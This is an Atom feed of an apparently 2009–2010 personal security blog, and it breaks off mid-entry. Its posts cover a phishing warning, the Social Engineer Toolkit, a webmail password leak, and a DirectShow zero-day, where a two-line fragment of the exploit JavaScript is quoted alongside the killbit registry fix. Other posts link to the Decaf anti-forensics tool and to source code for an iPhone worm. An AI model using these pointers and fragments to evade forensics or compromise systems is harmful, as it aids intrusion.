<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6228830703203241821</id><updated>2011-07-08T03:26:43.229-07:00</updated><title type='text'>Jack In The Box</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>30</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-6802495006107276174</id><published>2010-03-11T01:38:00.000-08:00</published><updated>2010-03-11T01:40:29.726-08:00</updated><title type='text'>New phishing scam</title><content type='html'>Attorney General Jim Hood is warning credit union members of an apparent phishing scam.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.hattiesburgamerican.com/article/20100310/NEWS01/100310012/AG+warns+of+credit+union+phishing+scam"&gt;Read this&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-6802495006107276174?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/6802495006107276174/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=6802495006107276174' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6802495006107276174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6802495006107276174'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2010/03/new-phishing-scam.html' title='New phishing scam'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-988883760573158012</id><published>2010-01-13T08:13:00.000-08:00</published><updated>2010-01-13T08:29:10.392-08:00</updated><title type='text'>altalsec</title><content type='html'>Dear Friends, &lt;br /&gt;&lt;br /&gt;altalsec urity provide the following services:&lt;br /&gt;&lt;br /&gt; - Penetration Testing&lt;br /&gt; - Vulnerability Research&lt;br /&gt; - Information Secuity Training&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.altalsec.com/"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 226px; height: 86px;" src="http://www.altalsec.com/altalsec.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-988883760573158012?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/988883760573158012/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=988883760573158012' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/988883760573158012'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/988883760573158012'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2010/01/altalsec.html' title='altalsec'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-6200073265295483771</id><published>2010-01-12T02:16:00.000-08:00</published><updated>2010-01-12T03:41:48.642-08:00</updated><title type='text'>Backtrack 4 Final --&gt; out</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.backtrack-linux.org/images/bt4-fireworks-1.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 482px; height: 337px;" src="http://www.backtrack-linux.org/images/bt4-fireworks-1.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Mazal tov to Muts, Irissan &amp;&amp; Remote-exploit team.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-6200073265295483771?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/6200073265295483771/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=6200073265295483771' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6200073265295483771'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6200073265295483771'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2010/01/backtrack-4-final-out.html' title='Backtrack 4 Final --&gt; out'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-5591288362921547814</id><published>2009-12-15T01:12:00.000-08:00</published><updated>2009-12-15T01:20:11.858-08:00</updated><title type='text'>Decaf Please</title><content type='html'>A new Anti Forensics tool have been released this week, Download link:&lt;a href="http://www.decafme.org/"&gt;decaf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"According to the Register, the program deletes temporary files or processes associated with COFEE, erases all COFEE logs, disables USB drives, and contaminates or spoofs a variety of MAC addresses to muddy forensic tracks."&lt;br /&gt;&lt;br /&gt;Read the full article:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.wired.com/threatlevel/2009/12/decaf-cofee/"&gt;Hackers Brew Self-Destruct Code to Counter Police Forensics&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-5591288362921547814?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/5591288362921547814/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=5591288362921547814' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5591288362921547814'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5591288362921547814'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/12/decaf-please.html' title='Decaf Please'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-4597160205289107588</id><published>2009-11-11T04:18:00.000-08:00</published><updated>2009-11-11T04:20:21.218-08:00</updated><title type='text'>iPhone new Worm - ikee</title><content type='html'>Source code available on line....&lt;a href="http://www.justfuckinggoogleit.com"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-4597160205289107588?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/4597160205289107588/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=4597160205289107588' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/4597160205289107588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/4597160205289107588'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/11/iphone-new-worm-ikee.html' title='iPhone new Worm - ikee'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-2241533004871232467</id><published>2009-10-07T01:32:00.000-07:00</published><updated>2009-10-07T01:36:45.873-07:00</updated><title type='text'>Ready? ./set</title><content type='html'>&lt;strong&gt;Social Engineer Toolkit:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The Social Engineering Toolkit (SET) is a python-driven suite of custom tools, &lt;br /&gt;SET has two main methods of attack, one is utilizing Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. &lt;br /&gt;&lt;br /&gt;The SET is designed to make complex social engineering tasks relatively simple for you by allowing you to utilize a robust framework for penetration tests. &lt;br /&gt;&lt;br /&gt;SET works with metasploit and basicaly targets on automatic mail and website attack.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-2241533004871232467?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/2241533004871232467/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=2241533004871232467' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/2241533004871232467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/2241533004871232467'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/10/blog-post.html' title='Ready? ./set'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-575922940727416650</id><published>2009-10-07T00:35:00.000-07:00</published><updated>2009-10-07T01:12:53.908-07:00</updated><title type='text'>Email password leak update</title><content type='html'>After the leak of &lt;a href="http://www.telegraph.co.uk/technology/microsoft/6264539/Microsoft-Hotmail-leak-blamed-on-phishing-attack.html"&gt;10,000 Hotmail &lt;/a&gt;and Windows live email passwords and details yesterday, this morning it emerges that another list containing 20,000 e-mail addresses and passwords from Hotmail, Yahoo, AOL, Gmail and others service providers has been posted online.&lt;br /&gt;&lt;br /&gt;There were more then 10,028 pairs of user names and passwords posted to multiple pages of public upload website like &lt;a href="http://pastebin.com/"&gt;Pastebin.com&lt;/a&gt;, some of which remained live at time of writing. The stash is likely only a small sample of a much larger file, &lt;br /&gt;&lt;br /&gt;Wouldn't it be great if this phishing was somehow linked to Mafia Wars or any other FB APP? could it be a phising attack?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.codinghorror.com/blog/archives/001072.html"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-575922940727416650?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/575922940727416650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=575922940727416650' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/575922940727416650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/575922940727416650'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/10/email-password-leak-update.html' title='Email password leak update'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-6147991325022373676</id><published>2009-08-25T02:15:00.000-07:00</published><updated>2009-08-25T02:26:13.960-07:00</updated><title type='text'>Clarification</title><content type='html'>I would like to clarify the article that have been posted yesterday @themarker regards the security breach in Cellcom website. I didn`t do any penetration testing or auditing on the website.&lt;br /&gt;&lt;br /&gt;I just got the link and been asked for my professional opinion. As far as i know, the security department knew about the risks that this info can lead. that`s all.&lt;br /&gt;&lt;br /&gt;M4y th3 S0urce b3 w1th u5.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-6147991325022373676?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/6147991325022373676/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=6147991325022373676' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6147991325022373676'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6147991325022373676'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/08/clarification.html' title='Clarification'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-5579036174829122011</id><published>2009-08-25T02:10:00.000-07:00</published><updated>2009-08-25T02:14:38.762-07:00</updated><title type='text'>Audit VoiP++</title><content type='html'>A great suite of exploring, classifying, and auditing telephone systems that can be found in &lt;a href="http://warvox.org/"&gt;Warvox&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;the suite of tools provides the unique ability to classify all telephone lines in a given range, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders.&lt;br /&gt;&lt;br /&gt;WarVOX is intended for legal security assessment, asset inventory, and research purposes only.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-5579036174829122011?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/5579036174829122011/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=5579036174829122011' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5579036174829122011'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5579036174829122011'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/08/audit-voip.html' title='Audit VoiP++'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-7192189849919964307</id><published>2009-07-07T00:42:00.000-07:00</published><updated>2009-09-24T02:43:24.158-07:00</updated><title type='text'>DirectShow 0day in the wild</title><content type='html'>DirectShow 0day is a high rate of 0day exploit, the current outbreak has already begun last week online. In order for the attack to work the victim needs to use XP built-in Windows Media Player to play media files which in turn triggers internal loopholes. &lt;br /&gt;&lt;br /&gt;This is a client side (IE) exploit, so visiting a malicious site will result in infection. &lt;br /&gt;&lt;br /&gt;Attack characteristics are as follows: &lt;br /&gt;(I`ve found the code on http://**.****.cn website)&lt;br /&gt;&lt;br /&gt;var appllaa='0';&lt;br /&gt;myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';&lt;br /&gt;&lt;br /&gt;Microsoft's advisory offers workarounds for the issue (from today), including setting the killbit for the ActiveX control.&lt;br /&gt;&lt;br /&gt;There is one known hotfix and that is to set a "kill bit" in the registry for the ActiveX component.&lt;br /&gt;&lt;br /&gt;\x1 Create the following Key&lt;br /&gt;&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]&lt;br /&gt;"Compatibility Flags"=dword:00000400 &lt;br /&gt;&lt;br /&gt;\x2 Create a dword value named "Compatibility Flags" and give it a value of 400.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-7192189849919964307?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/7192189849919964307/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=7192189849919964307' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/7192189849919964307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/7192189849919964307'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/07/directshow-0day-in-wild.html' title='DirectShow 0day in the wild'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-5733351097023993092</id><published>2009-06-27T00:20:00.000-07:00</published><updated>2009-06-27T00:27:37.309-07:00</updated><title type='text'>Let it sn0w</title><content type='html'>The iPod/iPhone 3G jailbreak is out. The iphone-dev team just released the 24kpwn LLB patch to allow for a persistent jailbreak. The team had been hanging on to this patch because there was the possibility the exploit could be used on future iPhone versions. Unfortunately, a group started selling the code, so the team was forced to release it for free. There is a tutorial available for updating a factory reset iPod/iPhone (backup link).&lt;br /&gt;&lt;br /&gt;That means the same sort of technique can be used with the current redsn0w tool to jailbreak and unlock the &lt;a href="http://iphwn.org/24kpwnliveson.txt"&gt;iPhone 3GS&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;Let it &lt;a href="http://blog.iphone-dev.org/"&gt;ultrasn0w....&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-5733351097023993092?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/5733351097023993092/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=5733351097023993092' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5733351097023993092'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5733351097023993092'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/06/ipodiphone-3g-jailbreak-is-out.html' title='Let it sn0w'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-5919052361357728456</id><published>2009-06-17T01:20:00.000-07:00</published><updated>2009-06-17T01:23:27.367-07:00</updated><title type='text'>Infosec 2009</title><content type='html'>Open world, Open standards, Open source...&lt;br /&gt;&lt;a href="http://www.thepeople.co.il/Index.asp?CategoryID=82&amp;ArticleID=1070"&gt;Infosec2009&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Going to be very interesting ;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-5919052361357728456?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/5919052361357728456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=5919052361357728456' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5919052361357728456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5919052361357728456'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/06/infosec-2009.html' title='Infosec 2009'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-5373079084779210508</id><published>2009-05-26T02:34:00.000-07:00</published><updated>2009-05-26T03:35:08.621-07:00</updated><title type='text'>[Sum]mation ILHack</title><content type='html'>Good morning All! First, I would like to thank Yaniv Miron for organizing such a great conference and inviting me to speak about VoIP Tactics &amp;&amp; Exploitaion at &lt;a href="http://www.ilhack.org/2009/"&gt;ILHack 2009&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;Next, this one goes to all of my Students/Friends/Colleages thanks for the BIG support. You are all in my local &lt;a href="http://127.0.0.1"&gt;subnet&lt;/a&gt; ;)&lt;br /&gt; &lt;br /&gt;Special 10x to SIPM4ST3R &lt;a href="http://www.maxxvoice.com/"&gt;yossef cohen&lt;/a&gt; for the lab organization, coding, and talking about the SIP Protocol as a part of the lecture.&lt;br /&gt;&lt;br /&gt;The presentation, video of the lecture and source code for(SIPy and sip00fer) will be available --&gt; ILHack download section during this weekend.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_RROvHJzP0eo/Shu4ttem8oI/AAAAAAAAADg/SkQ5JmZXhy0/s1600-h/jacky_altal.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 148px;" src="http://2.bp.blogspot.com/_RROvHJzP0eo/Shu4ttem8oI/AAAAAAAAADg/SkQ5JmZXhy0/s200/jacky_altal.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5340064878619456130" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Hope to see you all, soon.&lt;br /&gt;&lt;br /&gt;Jacky Altal&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-5373079084779210508?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/5373079084779210508/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=5373079084779210508' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5373079084779210508'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/5373079084779210508'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/05/summation-ilhack.html' title='[Sum]mation ILHack'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_RROvHJzP0eo/Shu4ttem8oI/AAAAAAAAADg/SkQ5JmZXhy0/s72-c/jacky_altal.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-2097138894739645212</id><published>2009-05-20T04:25:00.000-07:00</published><updated>2009-05-21T03:44:11.302-07:00</updated><title type='text'></title><content type='html'>&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-2097138894739645212?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/2097138894739645212/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=2097138894739645212' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/2097138894739645212'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/2097138894739645212'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/05/zero-one-two-smile-or-n0t.html' title=''/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' 